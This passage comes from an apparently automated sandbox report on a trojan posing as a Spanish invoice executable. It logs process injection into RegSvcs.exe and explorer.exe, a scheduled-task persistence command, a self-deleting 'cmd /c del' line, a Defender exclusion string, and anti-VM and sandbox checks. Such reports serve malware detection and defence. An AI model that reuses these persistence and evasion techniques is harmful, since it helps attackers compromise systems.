            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629770 NtSetInformationFile,6_2_01629770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162A770 NtOpenThread,6_2_0162A770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629730 NtQueryVirtualMemory,6_2_01629730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162A710 NtOpenProcessToken,6_2_0162A710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629FE0 NtCreateMutant,6_2_01629FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629670 NtQueryInformationProcess,6_2_01629670
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629650 NtQueryValueKey,6_2_01629650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629610 NtEnumerateValueKey,6_2_01629610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016296D0 NtCreateKey,6_2_016296D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829840 NtDelayExecution,LdrInitializeThunk,10_2_04829840
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829860 NtQuerySystemInformation,LdrInitializeThunk,10_2_04829860
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048299A0 NtCreateSection,LdrInitializeThunk,10_2_048299A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048295D0 NtClose,LdrInitializeThunk,10_2_048295D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04829910
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829540 NtReadFile,LdrInitializeThunk,10_2_04829540
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048296D0 NtCreateKey,LdrInitializeThunk,10_2_048296D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048296E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_048296E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829650 NtQueryValueKey,LdrInitializeThunk,10_2_04829650
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829A50 NtCreateFile,LdrInitializeThunk,10_2_04829A50
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04829660
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829780 NtMapViewOfSection,LdrInitializeThunk,10_2_04829780
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829FE0 NtCreateMutant,LdrInitializeThunk,10_2_04829FE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829710 NtQueryInformationToken,LdrInitializeThunk,10_2_04829710
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048298A0 NtWriteVirtualMemory,10_2_048298A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048298F0 NtReadVirtualMemory,10_2_048298F0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829820 NtEnumerateKey,10_2_04829820
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482B040 NtSuspendThread,10_2_0482B040
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048299D0 NtCreateProcessEx,10_2_048299D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048295F0 NtQueryInformationFile,10_2_048295F0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829520 NtWaitForSingleObject,10_2_04829520
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482AD30 NtSetContextThread,10_2_0482AD30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829950 NtQueueApcThread,10_2_04829950
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829560 NtWriteFile,10_2_04829560
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829A80 NtOpenDirectoryObject,10_2_04829A80
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829A00 NtProtectVirtualMemory,10_2_04829A00
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829610 NtEnumerateValueKey,10_2_04829610
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829A10 NtQuerySection,10_2_04829A10
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829A20 NtResumeThread,10_2_04829A20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829670 NtQueryInformationProcess,10_2_04829670
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048297A0 NtUnmapViewOfSection,10_2_048297A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482A3B0 NtGetContextThread,10_2_0482A3B0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829B00 NtSetValueKey,10_2_04829B00
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482A710 NtOpenProcessToken,10_2_0482A710
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829730 NtQueryVirtualMemory,10_2_04829730
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829760 NtOpenProcess,10_2_04829760
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829770 NtSetInformationFile,10_2_04829770
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482A770 NtOpenThread,10_2_0482A770
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA360 NtCreateFile,10_2_029AA360
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA490 NtClose,10_2_029AA490
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA410 NtReadFile,10_2_029AA410
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA540 NtAllocateVirtualMemory,10_2_029AA540
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA35A NtCreateFile,10_2_029AA35A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA53A NtAllocateVirtualMemory,10_2_029AA53A
            Source: Factura de proforma.exeBinary or memory string: OriginalFilename vs Factura de proforma.exe
            Source: Factura de proforma.exe, 00000000.00000002.327421631.0000000007900000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs Factura de proforma.exe
            Source: Factura de proforma.exe, 00000000.00000000.296727350.00000000007A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCachedDa.exe6 vs Factura de proforma.exe
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: i,\\StringFileInfo\\000004B0\\OriginalFilename vs Factura de proforma.exe
            Source: Factura de proforma.exeBinary or memory string: OriginalFilenameCachedDa.exe6 vs Factura de proforma.exe
            Source: Factura de proforma.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: tskpCbAwtxoaw.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Factura de proforma.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: tskpCbAwtxoaw.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Factura de proforma.exe; File read: C:\Users\user\Desktop\Factura de proforma.exe
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown; Process created: C:\Users\user\Desktop\Factura de proforma.exe 'C:\Users\user\Desktop\Factura de proforma.exe'
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'
            Source: C:\Windows\SysWOW64\schtasks.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\Factura de proforma.exe; File created: C:\Users\user\AppData\Local\Gottschalks
            Source: C:\Users\user\Desktop\Factura de proforma.exe; File created: C:\Users\user\AppData\Local\Temp\tmpD689.tmp
            Source: classification engine; Classification label: mal100.troj.evad.winEXE@10/4@4/1
            Source: C:\Users\user\Desktop\Factura de proforma.exe; File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_01
            Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_01
            Source: C:\Windows\explorer.exe; File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\Desktop\Factura de proforma.exe; File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Factura de proforma.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Factura de proforma.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: RegSvcs.exe, 00000006.00000002.406155784.00000000036A0000.00000040.00020000.sdmp
            Source: Binary string: RegSvcs.pdb, source: cscript.exe, 0000000A.00000002.573045416.0000000004CEF000.00000004.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, cscript.exe
            Source: Binary string: RegSvcs.pdb source: cscript.exe, 0000000A.00000002.573045416.0000000004CEF000.00000004.00020000.sdmp
            Source: Binary string: cscript.pdb source: RegSvcs.exe, 00000006.00000002.406155784.00000000036A0000.00000040.00020000.sdmp

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: Factura de proforma.exe, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: tskpCbAwtxoaw.exe.0.dr, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.Factura de proforma.exe.7a0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.Factura de proforma.exe.7a0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: C:\Users\user\Desktop\Factura de proforma.exeCode function: 0_2_070C4BBD push FFFFFF8Bh; iretd 0_2_070C4BBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D4B5 push eax; ret 6_2_0041D508
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D56C push eax; ret 6_2_0041D572
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D502 push eax; ret 6_2_0041D508
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D50B push eax; ret 6_2_0041D572
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419F75 push ebx; iretd 6_2_00419F7D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0163D0D1 push ecx; ret 6_2_0163D0E4
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0483D0D1 push ecx; ret 10_2_0483D0E4
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029A9F75 push ebx; iretd 10_2_029A9F7D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD4B5 push eax; ret 10_2_029AD508
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD50B push eax; ret 10_2_029AD572
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD502 push eax; ret 10_2_029AD508
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD56C push eax; ret 10_2_029AD572
            Source: initial sampleStatic PE information: section name: .text entropy: 7.7904887088
            Source: C:\Users\user\Desktop\Factura de proforma.exeFile created: C:\Users\user\AppData\Roaming\tskpCbAwtxoaw.exe

            Boot Survival:

            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'

            Hooking and other Techniques for Hiding and Protection:

            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE0
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.2bd16b0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Factura de proforma.exe PID: 6952, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000002999904 second address: 000000000299990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000002999B7E second address: 0000000002999B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Factura de proforma.exe TID: 6384Thread sleep time: -45175s >= -30000s
            Source: C:\Users\user\Desktop\Factura de proforma.exe TID: 4852Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 7112Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\cscript.exe TID: 6368Thread sleep time: -32000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409AB0 rdtsc 6_2_00409AB0
            Source: C:\Users\user\Desktop\Factura de proforma.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\cscript.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeThread delayed: delay time: 45175
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000007.00000000.362850284.0000000000B7D000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000000.352399767.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000007.00000000.354893243.000000000EE50000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
            Source: explorer.exe, 00000007.00000000.375277413.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
            Source: explorer.exe, 00000007.00000000.333973345.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.352399767.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
            Source: explorer.exe, 00000007.00000000.333973345.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
            Source: explorer.exe, 00000007.00000000.337688862.00000000087C2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
            Source: explorer.exe, 00000007.00000000.352399767.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160B944 mov eax, dword ptr fs:[00000030h]6_2_0160B944
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E52A5 mov eax, dword ptr fs:[00000030h]6_2_015E52A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E52A5 mov eax, dword ptr fs:[00000030h]6_2_015E52A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E52A5 mov eax, dword ptr fs:[00000030h]6_2_015E52A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160C577 mov eax, dword ptr fs:[00000030h]6_2_0160C577
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160C577 mov eax, dword ptr fs:[00000030h]6_2_0160C577
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01623D43 mov eax, dword ptr fs:[00000030h]6_2_01623D43
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01663540 mov eax, dword ptr fs:[00000030h]6_2_01663540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01607D50 mov eax, dword ptr fs:[00000030h]6_2_01607D50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0166A537 mov eax, dword ptr fs:[00000030h]6_2_0166A537
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614D3B mov eax, dword ptr fs:[00000030h]6_2_01614D3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614D3B mov eax, dword ptr fs:[00000030h]6_2_01614D3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614D3B mov eax, dword ptr fs:[00000030h]6_2_01614D3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8D34 mov eax, dword ptr fs:[00000030h]6_2_016B8D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EAD30 mov eax, dword ptr fs:[00000030h]6_2_015EAD30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01698DF1 mov eax, dword ptr fs:[00000030h]6_2_01698DF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]6_2_01666DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]6_2_01666DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]6_2_01666DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov ecx, dword ptr fs:[00000030h]6_2_01666DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]6_2_01666DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]6_2_01666DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FD5E0 mov eax, dword ptr fs:[00000030h]6_2_015FD5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FD5E0 mov eax, dword ptr fs:[00000030h]6_2_015FD5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016135A1 mov eax, dword ptr fs:[00000030h]6_2_016135A1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B05AC mov eax, dword ptr fs:[00000030h]6_2_016B05AC
